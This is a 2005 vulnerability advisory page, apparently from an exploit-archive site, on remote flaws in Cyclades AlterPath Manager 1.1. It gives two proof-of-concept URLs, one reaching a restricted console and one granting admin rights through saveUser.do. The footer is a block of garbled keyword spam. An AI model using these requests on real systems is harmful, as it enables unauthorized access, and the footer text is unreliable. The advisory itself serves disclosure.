about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Cyclades AlterPath Manager Multiple Remote Vulnerabilities


Title Cyclades AlterPath Manager Multiple Remote Vulnerabilities
Published 2005-02-24-12:00AM
Updated 2005-03-03-06:39PM
Class Design Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Sullo <sullo@cirt.net> is credited with the discovery of these issues.
Vulnerable  Cyclades Corporation AlterPath 1.1
Not Vulnerable  Cyclades Corporation AlterPath 1.2.1
Cyclades Corporation AlterPath 1.2
Code   No exploit is required to leverage these issues. The following proof of concepts have been provided:

To access a restricted console resource:
http://www.example.com/usermode/consoleConnect.jsp?consolename=console_name

To gain escalated privileges:
http://www.example.com/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 12:22:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sexz photo Qpopper po www.2nwe.c www.deyi98 Sex fuking sex88.com vidio ip+board+2 tinywebgal www.url138 maxcpm.inf vidio all cartoo OpenSSH 3. php-nuke 2 search/exp saxse move ftp wh ebmin www.it197. shopping.a studentsex www.cz007. all cartoo vbulletin www.wold%2 lo81l Trisha bet t583t vbulletin invision b rachel wie phpmyadmin people hav freeworlds 2.4 exploi free clip Hunkaray maxcpm.inf www.876666 200 /compo www.2568cn xxnx.com Sabdrimer messenger Pamala and aduktsex.c www.cfsupe Tamil sex 5269wz.cn